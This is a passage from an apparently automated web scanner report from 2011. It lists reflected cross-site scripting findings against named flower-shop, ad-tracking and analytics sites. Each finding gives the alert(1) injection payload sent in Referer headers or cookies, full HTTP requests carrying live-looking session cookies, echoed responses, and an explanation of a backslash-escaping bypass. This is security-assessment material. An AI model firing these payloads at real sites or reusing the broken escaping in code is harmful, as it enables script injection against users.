Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=63bd1\"%3balert(1)//70a1cda672b

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30045703&2/11/2011 2:39:50 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:39:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:39:50 GMT
Connection: close
Content-Length: 168236


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30045703","30045703","30045703","405366","72","organicgglgeneric_63bd1\\";alert(1)//70a1cda672b","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.91. http://products.proflowers.com/roses/Two-Dozen-Long-Stemmed-Red-Roses-504 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/Two-Dozen-Long-Stemmed-Red-Roses-504

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138e4\"%3balert(1)//0d999bc9648 was submitted in the Referer HTTP header. This input was echoed as 138e4\\";alert(1)//0d999bc9648 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /roses/Two-Dozen-Long-Stemmed-Red-Roses-504 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=138e4\"%3balert(1)//0d999bc9648

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?504&2/11/2011 2:39:30 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:39:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:39:32 GMT
Connection: close
Content-Length: 169019


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
adCalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("504","504","504","298241","72","organicgglgeneric_138e4\\";alert(1)//0d999bc9648","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.92. http://products.proflowers.com/tulips/20-Rainbow-Valentines-Tulips-426 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /tulips/20-Rainbow-Valentines-Tulips-426

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abfa\"%3balert(1)//42c9bbf7a62 was submitted in the Referer HTTP header. This input was echoed as 3abfa\\";alert(1)//42c9bbf7a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /tulips/20-Rainbow-Valentines-Tulips-426 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=3abfa\"%3balert(1)//42c9bbf7a62

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?426&2/11/2011 2:39:36 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:39:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:39:36 GMT
Connection: close
Content-Length: 166842


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
adCalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("426","426","426","409373","72","organicgglgeneric_3abfa\\";alert(1)//42c9bbf7a62","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.93. http://products.proflowers.com/tulips/20-Sweetheart-Tulips-2744 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /tulips/20-Sweetheart-Tulips-2744

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9c52\"%3balert(1)//ffa0aa0cec3 was submitted in the Referer HTTP header. This input was echoed as e9c52\\";alert(1)//ffa0aa0cec3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /tulips/20-Sweetheart-Tulips-2744 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=e9c52\"%3balert(1)//ffa0aa0cec3

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?2744&2/11/2011 2:40:59 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:40:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:41:00 GMT
Connection: close
Content-Length: 164440


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
CalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("2744","2744","2744","43326","72","organicgglgeneric_e9c52\\";alert(1)//ffa0aa0cec3","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.94. http://tags.bluekai.com/site/50 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/50

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 243c4'-alert(1)-'d364363071b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=243c4'-alert(1)-'d364363071b
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpE8VaQtwGt6JKHRxRlMYUehXOxymGwj1kYVzy1cny1eOvulA9hDSeRPV+7/WLPvwqdoutxBRZBQKWJA1UsT16n1RVJxRTw/Lq/z9zrJQADu2UU9GGO9BVGsj1=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqEpyKodzE/yKnx01sh2sIMfjIUcuf8JY4RytoXJocT5DctrzWZ/C0sbK2ePQXh7RgC+0L9x8KcakQaVeNEm/1Q9142UU5SKALAj2M9Ss/O92Xrq1EOyj+fAFsK1ga8Y6+FlbIlgMzPrn4RysZQTD/VxOxBe+jJgTxoEjwDQdf3okMnBTLit+ffFlpL2gXQIevpK0ovOTKYwx18+oieUQ40fB/AOEO+Px+yP5K10UfNFZltN0eglCNPEGwgLQwoY7sRf7WSh8pdxc7Hd89wP1pBy95DFZKI5GtAOLQzDEGTBes9bojZOTErVXBGaNk53pzYyTrRbnkzn2wC9+yKA7GmCsvCKu0JDqg/kLgrrVMFedxXhFX9Ii9cAAg292ERp5HHUtSvcafg8Y8C9bodR1EeWdmq1+qRc3V4CjVYx71w/D1e3fXr9O3EOTxxYJH4t0pZuGJb8qurnsNQ296i2micNHGa1z5L5xvTeZEdJOsJwbAoYI3uXKM69XKMhg9==; bklc=4d55308f; bk=yQSpJZmZF9ysHNJo; bkc=KJh5NP+/asWD9m9pK2w55z7yxq5kYXJqAZD3VakKDFOuZ67KWSNyaTBWnSiAF/u/kWoCxQd5/R1/BJ9GLGH1GG59Y/EYY//GCRo/0FOOmt5tdoA8dXwmXrtz1dd+pakda/eco6YG+MvQ9/94fjjzqyw59hS9wj69SNVs1Nv8vNlzkYIziJXzpaX0rzgaUuZjXGDc/XnKZZTT+TWfEfvd6lOUJ/92VRaBJd1e5iiL/e23OKRh0EuKXWBUtJ4EyLXMjd5hE6yRc7/9MBECdCDKekQ6clHp3drgKzDJT1n24d0MU167aIwppubx7BfOwU31rbvOm24nfRFkd+qBwHfAoFAv+IeatGmdJKpcIz4T0cH4KOG2FQsQflhry9jFe8ecJamXXWRwxWtY9AIfXlYdqxUAfNQWjkmXXOSLp6rBYkCV0+E8AJ+2lYcJkYXziKF8CwF8L2gyC5wzwj/oU2isXyA2DveBqMQGrDZ02yql0IFzy87zcIv8X0XY1XNcKOFVlpbXcp/8UfJSq8GcLHSU/CuR4HlxdPL0hxLlR8WroQezwZPTxEnaY8dxpFKZ8i5tQvkS4WdmkVO2U/AZ6d+QBLDnlX42ELnlBlbCamFebuO4fK9KkAp8yAKNXPK4oVs2EnSEqy6R7LETsz0wXNv2mGeXuMnkYX2Mw8C+Ol9rkbgg/q2o8SjTTHazZ0BuQzyaybAfQJ7iCSKNXp7pl7YmZp+3tgYEpgKcrbZUKI3STK5GsIqw70lHlqIjZXRUo7pbfGXgDClW0ICbl1mi9+llJamIXOeVjp7Vz0ntp0i/PHNvTvjTTPazbtfzgfUaFVGIKS5A242W16TwV+a4EeTrrPT0Ek5lYm++gCgQlz55rr1XlJxFf1cILH3+yWhlkr8kOp4aYN5QwSu6RJdL1oyLZKva3fE8kZ7rNLjFLhorkw0Fh7Y+BHydSzAvV1sir+4w4uKeIbfArAHa20I+cM8qyLX7clJpVd2yetndWab775KX0SDjladdzL5QFhRsgEbYtNB6DpXpKyffG2AFWgZ2u5pjK5paAFNcewXchwiH2x==; bkst=KJhkAnNv96WDCxzBYYqOyk/DYyLnPIq7p+0jxixZSXyZi6Q6DjrxpHoJk/6sTb3BMSt5gteoWtQkwGYkRsV77VIQLNLJlrg07U18C8LCE8wWpF+ahzIxjfLFWv8NV0+xMQAj5ue9y9kWtcUY+QRCOOgEh4MBLd8Ub8XQGIQGsLHHqHy+IgjGZQ9aTWoEek/pQ6oydEsV0awjBYl5dK04bXzDl4hc5hqBWfX6G1KBJ7MPA323y6S840qweb35653sWAapYpbEwF4Vm6mvOq4rrANdXXugRgZNcD4fkXmTTQpgXwmNRZl8UBGHaxUeMEszYD6jYFa07uEmogJCkWFvrWODisi6W5t2cuFw8x7JAzBN+IB57HqfrN8diu4XNFJaWF4YkLwLApuP/WDnxZe/mE4/QpRLtf2v3RNK4RQndi28rkgN; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 11 Feb 2011 18:33:12 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=PbEVTB7F/B6sHNJo; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NV+/PWWDOdOp524NLD3sAB30OSsgujSoRsU8u1kcquq8HgEYUxyu+SYuXCWiDi3aYUlGeukWG/aWAuPAW76/CW9GMYY/V3WiAMnXAJNp2Xfmw4BC5dl+7M1p5IfdMrA9AmEDyB2Eb5cyflHXgPmzsyd1R8czIhpzCRggq5yhys6NtRPMHIcXFkooCt/SElM99gYfWtYNuMGMkqL0QoFbC5lT0LcIJjmg/gQgaPmdXsOGyaFuoU1qrw1Drp3krX/9xo/NtcQ0lh1YCHUACbl9wvbR8CBIWOcy8qE9KmELwrfJuKACmXO/cK84TVswh4OOOfKIFTjUyQWizwX44udUIX7amnfjORgEmfCcMlaUBcOEFLhth7JdfKSKXcnEKGPqX1lSQ2XkfL4NhpMJ2nFyecoiwDe4IP0we5Tz//Xgo7gCePW9BRASwm7mydttajYdRxM1o7gCpjMwuT6SVaqv2wVxZ8lzwLUDnh0sNd1H2dBc+4ua62y2i3k4t/qgX5lUGYNWt3rTuUcXeKTUNfZc1f74Jle7UyHZVGdyPLp4UFp5jlvIRMNFCQzhi6rCsL02XQE2upcPYp5MuO5E9sb4AFRgo7gCWXq2FV7TzxM95Y6IJI5v1O2UGL76wJCB2zJMrB2JIwyZIWLhcIatX+DmfZcaNY2XNJMdl216p1+Dmd7VQwxDNL2i4NyX85Dm8JKv3P2T9zIerUS9XmPudUg/gNr83P8TOvdBc3jOokXb5ELyDflyMcadpg0Ep7ayHX8/C2w2fKarbrVKFiq2esledGVpJDclqIvZIRVo7pffTTo6Kda+5YlrRPaO6wzDDfdyWmSpcwwLhF1pWZJNIhv83P8Tav2NaIfUbr/KFjIXxfcIdXxynQ2S6j2Bw3bTUMWrBtQ48ZtIsre+C8NOh6PhDf2yaJT4db/NZmlmY7gjpAlNyCVRC8xVwYKfoJ1PDfNykqcK1Lw5hFh+PrkshU2gosr+Q4Gou8qcYCq5Fufrmh7z5hUUrqVQ4ho8IsxJMWXI8mYtdrRKhwBeK/NhFhj1nLlQdFvcmyqwStWyXrc5kC/67V5ZpIw8SwjpBl5XW75tc7KhR+zHb4Il6viF; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJhn8sPQKBWxbLFWT19WREW04muaLKb0yaM3zea5cQSsgVXeQSyjleYVBNuVZKWmn6u1iDssMTsCQBD4vYLnjEWpz9OkJuu2QVvixnsgNL89kioxfw2nV0OgWCLeyh1QiTNOMQdYRZuxOnJu2qV9n9Yp/0jj; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsn/pkOQuWkvuDT0BDTp1MDlLpxlufWy1WLh1fs61nz61E90uD+I6He3YNE1y1Sxka6zEbym9WSLsJQ=; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkp1=KJhMRZOQ19niaytCFGy199hn9A9=; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpE8tOQRsxyRZOQW9qiaytCFQhGQ/zOovvaATWCXbO1rRATi1zaaOmW3F20IloMLPrJ4qU/mFKcPuUtFWOhaGq+zQy1I+fwfw8oQ5Hp9MULZXf9T1BLf3FgnwwbAjZDwRyIyLM9y1f9q1M9XmOKR5G2qVENr8Zy3t5kZ9BDltEkGgjakhMNq9pUQafzdvJ/XhHHb+AjdQnP7yLTD1VrMbpI0D+qgm38sHhBsOiAfeZ6XXc34yae0bmPQVcgt6e4w0LdUFJBugYc6481/wUgQmopCD+Yw9pHlRmrcZxIWXB+DySsv9XF+Qhe8w9cZ4IgnZ+w0Kx1KhQBeWYQIIUBsOQT1t20lMBsPiXCbKlfaHh4n4RysZQTD/VxOxBe+jJgTDHE2wx9zDK9wRpmjyvj2xuGFFHpErQvDtEpxKcMokgvB/LMt2fbF7dF2nyiIpYyIPSVe9yc4yH0qL/y48z7e8BtK8A2M9SojtjyOv3dFX3NqJLone0UJAcXslUM1kI2qhL6FDtOZZXcPOdiBBFCB/ofdQw5QhTIIVeprRe3kXplp+s6Q/VdRy1eylzLTqXngnfDZGaChzNNUvTVbwsnqM8/wx5e1PY2kAuGUvXaz4kgAh6eQdzc++eJkLMrFtg+e92wicLvf/1Rxm7Cn2OXZ8Abi3+L6z14lE6nZWe37yeBMd7BZV++eNnw9L0AA71RsxoRdEcz/y6mEh9GrqO4poWW2zh+VN7zymGjxmgPYSAlYZuvSlK9CxXpMFxtObpIOPO5iBbWssnPFyu3IfnG5zPtO8eFxKb4j9nhHIovxrbuXrgNrm49QOj4Lwx9YAXsC7OcOGjFCdqZ99YGGDbF; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 12-Feb-2011 18:33:12 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 737
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1068244&t=2" width=1 height=1 border=0 alt="">
<img src="http://leadback.advertising.com/adcedge/lb?si
...[SNIP]...
<script>var referrer='http://www.google.com/search?hl=en&q=243c4'-alert(1)-'d364363071b'; var hashID='dbdcb53f2576976d806d6498794024fc'; var taxonomyJSON=[];</script>
...[SNIP]...

2.95. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 8545a<script>alert(1)</script>a64660bacfd was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1420280 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
